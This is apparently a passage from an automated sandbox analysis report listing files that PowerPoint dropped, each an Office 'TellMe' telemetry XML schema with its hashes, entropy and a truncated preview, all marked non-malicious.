                                                                                                                              SHA1:EB45A94AD07C5829B7EEDA3D16CCFD720EB2B713
                                                                                                                              SHA-256:4E78C6936921EDD5E3E4A9F8868A1006472E25C97F0816075316BA2229ADDBBF
                                                                                                                              SHA-512:09491F43F62C7B04249BCEEBB128725A4DFC4A33C44EB8489ABE58BF79E6608CFF6AFB3868433F908E14620C0602AD1134563BDCDE3E6BD67D202632F9D45141
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68010" V="2" DC="SM" EN="Office.TellMe.TellMeD.HelpResults" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="bisx6" />.. <UTS T="2" Id="aw6j9" />.. </S>.. <G>.. <S T="2">.. <F N="sessionId" />.. </S>.. <S T="1">.. <F N="sessionId" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="TellMeSessionId">.. <S T="1" F="sessionId" />.. </C>.. <C T="G" I="2" O="false" N="TellMeQueryId">.. <S T="1" F="queryId" />.. </C>.. <C T="W" I="3" O="true" N="Query">.. <V V="QUERYSCRUBBED" T="W" />.. </C>.. <C T="U32" I="4" O="false" N="ResultCount">.. <S T="1" F="resultCount" />.. </C>.. <C T="U32" I="5" O="false" N="UserActionID">.. <V V="0" T="U32" />.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2419
                                                                                                                              Entropy (8bit):4.737419506295463
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:clvhg7Ft1IUSSlkTcWetK70kF2ZnHh0AHv7:EvhWtySHh0AHv7
                                                                                                                              MD5:5C5CCFF7DD0D4E70EE08E5427180285A
                                                                                                                              SHA1:B5B3F3D664EE2AA931241F6D56A836FC6727F499
                                                                                                                              SHA-256:D1276CFC5B01F9A1B94F5BCC1DE96E9AEF59D13874EB7C274BC8C3818F6E381A
                                                                                                                              SHA-512:D022304F364117DB4807C24089F889CE63062FDF1A519C3B880676E1AF5B92E78F5FF3FEC5C28A5B2F7008448D29F3FB5E49E7748DFFA9E09B5D96FDFB4D71E4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68011" V="4" DC="SM" EN="Office.TellMe.TellMeD.HelpSessionInfo" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="bik4t" />.. <UTS T="2" Id="bik4u" />.. <UTS T="3" Id="bik4v" />.. <UTS T="4" Id="bik4x" />.. <UTS T="5" Id="ck23t" />.. <UTS T="6" Id="bik5s" />.. <UTS T="7" Id="bisx7" />.. <UTS T="8" Id="aw6j9" />.. </S>.. <G>.. <S T="8">.. <F N="sessionId" />.. </S>.. <S T="1">.. <F N="sessionId" />.. </S>.. <S T="2">.. <F N="sessionId" />.. </S>.. <S T="3">.. <F N="sessionId" />.. </S>.. <S T="4">.. <F N="sessionId" />.. </S>.. <S T="5">.. <F N="sessionId" />.. </S>.. <S T="6">.. <F N="sessionId" />.. </S>.. <S T="7">.. <F N="sessionId" />.. </S>.. </G>.. <C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1224
                                                                                                                              Entropy (8bit):5.0191095661729275
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnN1aEPAQAmderH+erV8/eeWDee1lVA69JXhQ9JhlwtIdVDG5jY1N1Dckd0fh:2dicorHRrO6Pjo2kw5jQ15OFRJ7
                                                                                                                              MD5:F131A2F24216606DDA666DEC6B26FF07
                                                                                                                              SHA1:16A2DF6DA501A6E66DCA55D6984BFF83F8B42CB1
                                                                                                                              SHA-256:67639212694A2F0A165C768CD7579C600578262B09A265B1F2D1A48070087C39
                                                                                                                              SHA-512:C45001A435BCADD2E0DACB46F966FDBC42C3A362F3066C9EDA06D9C68393BC7A9D2CD24048CA06FADB4A3207AB8093D479168A1DE85CB88F2F07F23BCE63C128
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68012" V="2" DC="SM" EN="Office.TellMe.TellMeD.HelpFlyoutDropped" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="bik5s" />.. <UTS T="2" Id="aw6j9" />.. </S>.. <G>.. <S T="2">.. <F N="sessionId" />.. </S>.. <S T="1">.. <F N="sessionId" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="TellMeSessionId">.. <S T="1" F="sessionId" M="Ignore" />.. </C>.. <C T="G" I="2" O="true" N="TellMeQueryId">.. <S T="1" F="queryId" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="Query">.. <V V="QUERYSCRUBBED" T="W" />.. </C>.. <C T="U32" I="4" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="5" O="false" N="UserActionName">.. <
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1917
                                                                                                                              Entropy (8bit):4.986220934844517
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d+rsfcorthjgPjYtY1rDT4EsN+WsawSplzAfrkfLIkoI/NXr9ZYgaCgQ:cssf7hIYaEEsLsUygZ08F
                                                                                                                              MD5:6CB346F709284F5A38BB0C388C99DBBA
                                                                                                                              SHA1:1B70799CA12CA890FE66A8C3D559345DFD5EB488
                                                                                                                              SHA-256:CD870B691041A17EB2B094F9FF5B75A9FBEA62080D467145F65ACAB189EE3E74
                                                                                                                              SHA-512:FA0F3D98BA510F3A3B1BD5602518FF6275A4C278B6F59AD812EC13428DB20EBAF8B922537EE9349AA3746C6E9B0881EE036EF8F7523B1C267687595C856454F7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68013" V="9" DC="SM" EN="Office.TellMe.TellMeD.SubstateServiceResponse" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="8nqjp" A="bu1h9 bu1ih bu1ii bwm1p bu1h7" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="TellMeSessionId">.. <S T="1" F="sessionId" M="Ignore" />.. </C>.. <C T="TAG" I="2" O="true" N="Tag">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Result">.. <S T="1" F="result" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="HttpStatusCode">.. <S T="1" F="httpStatusCode" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="ResponseTime">.. <S T="1" F="responseTime" M="Ignore" />.. </C>.. <C T="U32" I="6" O="false" N="UserActi
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1492
                                                                                                                              Entropy (8bit):4.9812676715207145
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dE0ocorGPIc0YD1wDTfE6N+XzMNUhs7DiW:czo7VcjJ6E6m4NY+
                                                                                                                              MD5:C2E3C5A1F8F69A8B1C322ED7F8881490
                                                                                                                              SHA1:1FA6C8A33FCD974BA8FF6D1FF536EB0DA0499476
                                                                                                                              SHA-256:0A3855C45CF1806D8CA6CD76F21526DBE3C6D48D510C230650294BE717125429
                                                                                                                              SHA-512:D3D2CC442261506B5232855907897A4F4C0352BBAFA22D05BE144D085479520AD7B7371F93F3A9010846DB500DF40F452A2DBA9F7564735174A658F30A2546B7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68014" V="8" DC="SM" EN="Office.TellMe.TellMeD.OnlineSuggestionResponse" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="bxl7d" A="bxl7e" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="TellMeSessionId">.. <S T="1" F="sessionId" />.. </C>.. <C T="TAG" I="2" O="true" N="Tag">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="U32" I="3" O="false" N="Result">.. <S T="1" F="result" />.. </C>.. <C T="U32" I="4" O="false" N="HttpStatusCode">.. <S T="1" F="httpStatusCode" />.. </C>.. <C T="U32" I="5" O="false" N="ResponseTime">.. <S T="1" F="responseTime" />.. </C>.. <C T="U32" I="6" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="7" O="fa
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):863
                                                                                                                              Entropy (8bit):5.127553325484714
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd9vc7aEPAQAmder+lVA64X9dy9OxFkd+DOENO2su:2dZc+cor+PIvC+p
                                                                                                                              MD5:9A603FC6DA7CC8A3E7930211CECBD5E6
                                                                                                                              SHA1:617B4F6F684556601AD12F9EF0B7751E567CE2F3
                                                                                                                              SHA-256:FAFC826E9FEB314418018F026AA513FCBA88B8B20C51EBC5CC25A1B23E399CF6
                                                                                                                              SHA-512:05E507D7DED328CCC43E35FC19A60F696102A34969FF6A191CD37F31AB2F67AF78ECE9D5A339AEB52F2D11A0EF6499A68A5519A31741374921FB3AEA4F08D62F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68015" V="1" DC="SM" EN="Office.TellMe.TellMeD.CommandClickedEvents" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="bx4ar" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="TellMeSessionId">.. <S T="1" F="sessionId" />.. </C>.. <C T="W" I="2" O="true" N="CommandClickedEvents">.. <S T="1" F="commandClickedEvents" />.. </C>.. <C T="U32" I="3" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="4" O="false" N="UserActionName">.. <V V="TellMeD_CommandClickedEvents" T="W" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):670
                                                                                                                              Entropy (8bit):5.22721966541961
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdUqnGaEPAQAmder+lglVA6PkdyuUnENO2su:2d9JcorhPAes
                                                                                                                              MD5:5748B294448F9BFE342995EEC436B4FE
                                                                                                                              SHA1:90FDA1FAF7D4979B342696B93D10379CB3D730EA
                                                                                                                              SHA-256:2DDAF98581BACC042AB859AA39B4E874B4888560891F0F9104CA812595A8C08B
                                                                                                                              SHA-512:7DB344683A20AC88D64E78AED96084EA3249E092600E5E7F833C82EDBA548AF2002B36C87DAD03C284ECCF453F14A03FFB59C5CD1FF400927370B77F346BA478
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68016" V="1" DC="SM" EN="Office.TellMe.TellMeD.ShowTeachingCallout" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="bzuwj" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="2" O="false" N="UserActionName">.. <V V="TellMeD_ShowTeachingCallout" T="W" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):852
                                                                                                                              Entropy (8bit):5.12901436166847
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdvCO7aEPAQAmderTlVA64X9/9nU+Fkd+DO4cNO2su:2dKO+corTPIcf+L0
                                                                                                                              MD5:11FA1BFE897702F38D63302AF5747426
                                                                                                                              SHA1:0F68E4AC06A9169F2629661FEE0A38846F1B490A
                                                                                                                              SHA-256:75BA9F0673A49C5D764090A0D79B736932B5D8A085237F15C3E2F8F11E3D5E77
                                                                                                                              SHA-512:8BAEF84C39324A139198369DF464DFF7922C8E6B15B59173BAB289E6A209FF695372DFE9C8F5C45261222227E6B6A430A1848F8971D8443F5FE09EDF0E45F20B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68017" V="1" DC="SM" EN="Office.TellMe.TellMeD.PeopleActionEvents" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="b3vkl" A="b3vkn" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="TellMeSessionId">.. <S T="1" F="sessionId" />.. </C>.. <C T="TAG" I="2" O="true" N="Tag">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="U32" I="3" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="4" O="false" N="UserActionName">.. <V V="TellMeD_PeopleActionEvents" T="W" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):957
                                                                                                                              Entropy (8bit):5.118440135439064
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdN4d7aEPAQAmderN8RlVA64X9/9nU+isfgN1Dckd0ZNO2su:2dNu+corsPIcgO15Y
                                                                                                                              MD5:37D07D277195FB9E95033985B4747BA6
                                                                                                                              SHA1:2D8F041933138BB611C24CCFCE7B23E77D019846
                                                                                                                              SHA-256:F9FA6840FEEE9F367CC27D93746AFA77469564AD6BF2825B1A12937077E963F5
                                                                                                                              SHA-512:DE399A1E762BED3C9390304CD6132FC118C72949F75A3D59C344F330EB3ED6ECFD475D1FA431A1ECB8F3C15E33D9D1BD229E5A23FAA2DF595D559DFC8A48D5EB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68018" V="1" DC="SM" EN="Office.TellMe.TellMeD.DocumentActionEvents" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="bxl7q" A="b5vxl b5vxm" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="TellMeSessionId">.. <S T="1" F="sessionId" />.. </C>.. <C T="TAG" I="2" O="true" N="Tag">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="U8" I="3" O="false" N="DocumentType">.. <S T="1" F="DocType" M="Ignore" />.. </C>.. <C T="U32" I="4" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="5" O="false" N="UserActionName">.. <V V="TellMeD_DocumentActionEvents" T="W" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1403
                                                                                                                              Entropy (8bit):4.816936606288027
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd0UaEPAQAmderdfer8erMDeeW8/eeWHNeevXsNUWCf/0//XhmMp8kdWq4D7UH:2dwcorYrjrMkbbKsCkeRF
                                                                                                                              MD5:8B3995E8F9E41F6F027F0117ED696D9F
                                                                                                                              SHA1:4D0D09CFB09068FE0549756AD92DE13F9F586274
                                                                                                                              SHA-256:0136221BBD0B3E1DEB43D7E196E478AC704B8412E0072D86B8B477694E8EDB22
                                                                                                                              SHA-512:F16891F7DF46B05E5EF971C46614C64BB0A98FAD19AF520C0B6B39FC0394A8EE8B41AD5A3F55C708974ACE118795583FD6355ABAA99074EC454600C6B6D44614
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68019" V="2" DC="SM" EN="Office.TellMe.TellMeD.TimingMetrics" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="aw6kb" />.. <UTS T="2" Id="aw6j9" />.. <UTS T="3" Id="aw6j5" />.. </S>.. <G>.. <S T="1">.. <F N="sessionId" />.. </S>.. <S T="2">.. <F N="sessionId" />.. </S>.. <S T="3">.. <F N="sessionId" />.. </S>.. </G>.. <C T="G" I="0" O="false" N="TellMeSessionId">.. <S T="2" F="sessionId" />.. </C>.. <C T="U64" I="1" O="false" N="DwellTime">.. <O T="SUB">.. <L>.. <S T="2" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="1" F="TimeStamp100ns" />.. </R>.. </O>.. </C>.. <C T="U32" I="2" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="3" O="false" N="UserActionNa
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1020
                                                                                                                              Entropy (8bit):5.0656769615346375
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdE4G8X7aE3mderOMlVA6cnU+paSQO9Pi2Ym8N1DZ9uT9SjkdKOFhNO2su:2dED8unorfPlTY9DTy1VEHKqn
                                                                                                                              MD5:1ECC68B559FFCD4D7747281DF88A0043
                                                                                                                              SHA1:D2E1CA126A94EA3660A9A2805129BEDD2B8BB777
                                                                                                                              SHA-256:40587A53759DF4EF1E351EE0277F11870735EF8AF1514F8B4BA7224B70028C42
                                                                                                                              SHA-512:B0774488E5B148703E45D2774EFA9127946D08D296668A84C575E343AC1950C88BB4088C66E83FF3DF8C3016830CA0C745B378D08FAA6860426616AD9FD8A419
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68020" V="3" DC="SM" EN="Office.TellMe.TellMeD.AutoDiscoverSubstrateResponse" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="8nqin" A="b6rq1" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="TAG" I="1" O="true" N="Tag">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="U32" I="2" O="false" N="Result">.. <S T="1" F="result" />.. </C>.. <C T="U32" I="3" O="false" N="HttpStatusCode">.. <S T="1" F="httpStatusCode" />.. </C>.. <C T="U32" I="4" O="false" N="ResponseTime">.. <S T="1" F="responseTime" />.. </C>.. <C T="U32" I="5" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="6" O="false" N="UserActionName">.. <V V="TellMeD_AutoDiscoverSubstrateResponse" T="W" />.. </C>.. <T>.. <S T="1
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1530
                                                                                                                              Entropy (8bit):5.000011077180308
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d55/corarUc0nNEh++0KAe6+NkA4wwckWr5SZRF:cP7moc0V+07LRF
                                                                                                                              MD5:B9EA74866932BBD3F6F2FE207B644B5F
                                                                                                                              SHA1:0334FB05A4BAE788F3870A70150C6CD060966508
                                                                                                                              SHA-256:E5C11158FEF6ADF26F1A54C31336569A9C125C02A087F8F90BB45BA6F4F53898
                                                                                                                              SHA-512:0B56BD6AE0864859398200C601594339F47129F3D89645CB83B38045A63A9F73AD4C736B420C3A8C9AB8E34322599762080A9AF2AB96C70C09D1A05966E30CED
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68022" V="8" DC="SM" EN="Office.TellMe.TellMeD.ResultGroupTypeOrder" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="c3a4p" />.. <UTS T="2" Id="aw6j9" />.. </S>.. <C T="TAG" I="0" O="true" N="Tag">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="G" I="1" O="true" N="TellMeSessionId">.. <S T="1" F="SessionId" />.. </C>.. <C T="G" I="2" O="true" N="TellMeQueryId">.. <S T="1" F="QueryId" />.. </C>.. <C T="W" I="3" O="true" N="OrderBeforeRanking">.. <S T="1" F="OrderBefore" />.. </C>.. <C T="W" I="4" O="true" N="OrderAfterRanking">.. <S T="1" F="OrderAfter" />.. </C>.. <C T="U32" I="5" O="true" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="6" O="true" N="UserActionName">.. <V V="TellMeD_ResultGroupTypeOrder" T="W"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1175
                                                                                                                              Entropy (8bit):5.067778544938019
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdoUoF7aE3mderVlVA6cnU+p9lSQE45i2YmqN1xa9uT9EePcemxckd+vesKNOQ:2dKknorVPlAdDTw1gEV14N+WsK
                                                                                                                              MD5:4504226AE919FEC314E3226BE0362A89
                                                                                                                              SHA1:7FBAA98F7AB909F794CB9316BF4095478EB048CF
                                                                                                                              SHA-256:2409D8D04743818A608A6E507AA332CB7E90552C971228C55B91982473089769
                                                                                                                              SHA-512:ED6DD01A975F2D0B1A01641E015FC02B4BCE39F6E0EC6712FE21FCFEC6F2E4895E1B5D39921EAF9102A9D49F0B7C6D565A89066921D6F5DBA0D2C0D4A8AEFF75
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68023" V="2" DC="SM" EN="Office.TellMe.TellMeD.SubstateOfficeWebServiceResponse" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="8nqi1" A="cnq3y cnq34 cnq39" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="TAG" I="1" O="true" N="Tag">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Result">.. <S T="1" F="result" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="HttpStatusCode">.. <S T="1" F="httpStatusCode" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="ResponseTime">.. <S T="1" F="responseTime" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="PopulateIdentityTime">.. <S T="1" F="populateIdentityTime" M="Ignore" />.. </C>.. <C T="U32" I="6" O="false" N="UserActionID">.. <
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1673
                                                                                                                              Entropy (8bit):4.999227591555157
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2drdngnorepPlAO0dbY1rDT4EO1u+mAfrkw3LIkXIjrI/NhsK:crdgoCDAO0doEE60S/sK
                                                                                                                              MD5:11EFED7134E818D130CA82177C57039C
                                                                                                                              SHA1:94EE0F093173290DF9445DE23AA74AEE1CAADA01
                                                                                                                              SHA-256:6BC06B4BBC93B43E3B955D538DA8ED479FB33DBE1D6EF396545F9522ADE7CF72
                                                                                                                              SHA-512:D1853B3269BEE3A3CEC9D9208EA7AB224F08F87C7ABDFE64C4D7148DCEDD898EE604759195AC0A1168731FE1F4A3700DD33BC5B1F4E335A019C6F9C05AA13D1C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68024" V="2" DC="SM" EN="Office.TellMe.TellMeD.SubstateOfficeWebServiceResponseDetails" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="8nqih" A="cnq4c" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="TAG" I="1" O="true" N="Tag">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Endpoint">.. <S T="1" F="endpoint" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Result">.. <S T="1" F="result" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="HttpStatusCode">.. <S T="1" F="httpStatusCode" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="ResponseTime">.. <S T="1" F="responseTime" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="PopulateIdentityTime">.. <S T="1" F="populateIde
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):942
                                                                                                                              Entropy (8bit):5.07099005036855
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd/Ghc7aE3mder4elVA69JXh/9nU+4a9uT9EN1Dckd0rqNO2su:2dW/norBPjYyE4154q
                                                                                                                              MD5:AD37ACCECA3207A784768300E93651C2
                                                                                                                              SHA1:34D98B27F7B18B367B14D94F9851F967A646EEC3
                                                                                                                              SHA-256:3190CFA748DD039734E3F12C2A04AE7F8653C2CC92EDC8DE82D9E10861EBDB41
